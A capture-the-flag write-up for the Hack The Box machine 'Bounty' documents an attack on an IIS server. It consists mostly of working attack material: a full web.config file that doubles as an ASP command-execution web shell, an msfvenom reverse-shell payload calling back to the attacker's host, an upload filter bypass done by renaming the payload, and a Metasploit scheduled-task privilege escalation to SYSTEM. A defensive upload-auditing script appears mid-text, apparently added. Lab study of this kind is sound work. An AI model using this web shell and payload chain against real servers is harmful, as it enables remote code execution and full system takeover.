
# Bounty

### Initial Enumeration

```bash
# Nmap 7.70 scan initiated Thu Jul 18 22:03:22 2019 as: nmap --max-rate 1000 --min-parallelism 1000 -p- -T5 -oN T-all 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Thu Jul 18 22:05:34 2019 -- 1 IP address (1 host up) scanned in 131.98 seconds
```

![](/files/-Lk5CKbYKHqWW9MeejtU)

```bash
gobuster dir -k -t 200 -w /usr/share/wordlists/dirb/big.txt -o dirb-big -u http://10.10.10.93 -x asp,aspx
```

```bash
/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)
```

![](/files/-Lk5CP5QYxyo6FWMPm7M)

Using the following links I was able to get to a working web-shell:

* <https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/>
* <https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/>
* <https://github.com/tennc/webshell/blob/master/asp/webshell.asp>

web.config code

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<---- ASP CODE ---->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
```

![](/files/-Lk5D7-8BY11wIBuzo8c)

Now I created a payload to get a meterpreter session and uploaded it as `shell.exe.config`, which is allowed by the server. Using the web-shell I had, I renamed the file to `shell.exe` and then ran it.

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > shell.exe.config
```
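A defender-side check for the two upload weaknesses shown above: a web.config that remaps `*.config` to `asp.dll` and strips request filtering, and an extension allowlist that only looks at the last extension so `shell.exe.config` passes. This is an added example, not code from the write-up or the box; `audit_upload` and the sample web.config are constructed here.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a web.config of the kind described above (XML head, ASP tail).
SAMPLE_WEB_CONFIG = b"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
  <handlers accessPolicy="Read, Script, Write">
    <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
         scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" />
  </handlers>
  <security><requestFiltering>
    <fileExtensions><remove fileExtension=".config" /></fileExtensions>
    <hiddenSegments><remove segment="web.config" /></hiddenSegments>
  </requestFiltering></security>
</system.webServer></configuration>
<% Response.Write("asp") %>
"""

RISKY_INNER = {"exe", "dll", "asp", "aspx", "ashx", "asmx", "config"}

def audit_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons an upload should be rejected (empty list = accept)."""
    findings = []
    parts = filename.lower().split(".")
    # 1. Reject .config anywhere in the name, so web.config and shell.exe.config both fail.
    if "config" in parts[1:]:
        findings.append("filename carries a .config extension")
    # 2. Double extensions: a risky extension hidden before the final one.
    if any(p in RISKY_INNER for p in parts[1:-1]):
        findings.append("double extension")
    # 3. Content check independent of the name: PE header.
    if data[:2] == b"MZ":
        findings.append("content is a PE executable (MZ header)")
    # 4. Content check for configuration takeover: handler mappings, request-filtering
    #    removals, and server-side script appended after the XML.
    end = data.find(b"</configuration>")
    if end != -1:
        try:
            root = ET.fromstring(data[:end + len(b"</configuration>")])
        except ET.ParseError:
            root = None
        if root is not None:
            for add in root.iter("add"):
                if any(k.lower() == "scriptprocessor" for k in add.attrib):
                    findings.append(f"handler maps {add.get('path')} to {add.get('scriptProcessor')}")
            for rem in root.iter("remove"):
                if rem.get("fileExtension") or rem.get("segment"):
                    findings.append(f"request-filtering removal: {rem.attrib}")
        if b"<%" in data[end:]:
            findings.append("server-side script block after XML")
    return findings
```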

{% hint style="success" %}
NOTE: I was not able to find the `user.txt` flag at first so I just jumped ahead and went for root, however, I had to make the hidden files visible to get the `user.txt` file, which I realised way too late.
{% endhint %}

The shell was an x86 shell, so I had to upgrade to an x64 shell and then run the exploit suggester.

```bash
msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe
[*] Creating task: APiB17mL
[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...
[*] Original CRC32: 0xd0da0fc9
[*] Final CRC32: 0xd0da0fc9
[*] Writing our modified content back...
[*] Validating task: APiB17mL
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] APiB17mL                                 8/1/2019 8:35:00 PM    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".
[*] SCHELEVATOR
[*] Deleting the task...
[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 3 opened (10.10.14.7:4444 -> 10.10.10.93:49159) at 2019-07-18 23:12:11 +0530
```

This got me an `NT AUTHORITY\SYSTEM` shell.

### User Own

```bash
C:\Users\merlin\Desktop>attrib *.* -h -s /s /d

C:\Users\merlin\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/31/2018  12:17 AM    <DIR>          .
05/31/2018  12:17 AM    <DIR>          ..
05/30/2018  12:22 AM               282 desktop.ini
05/30/2018  11:32 PM                32 user.txt
               2 File(s)            314 bytes
               2 Dir(s)  11,854,745,600 bytes free
C:\Users\merlin\Desktop>type user.txt
e29ad***
```

### Root Own

```bash
C:\Users\Administrator\Desktop>type root.txt
c837f***
```

### Learning Outcome

Enumerate web directories and file extensions more thoroughly. Show hidden files as soon as you get a shell, so you do not miss anything important.

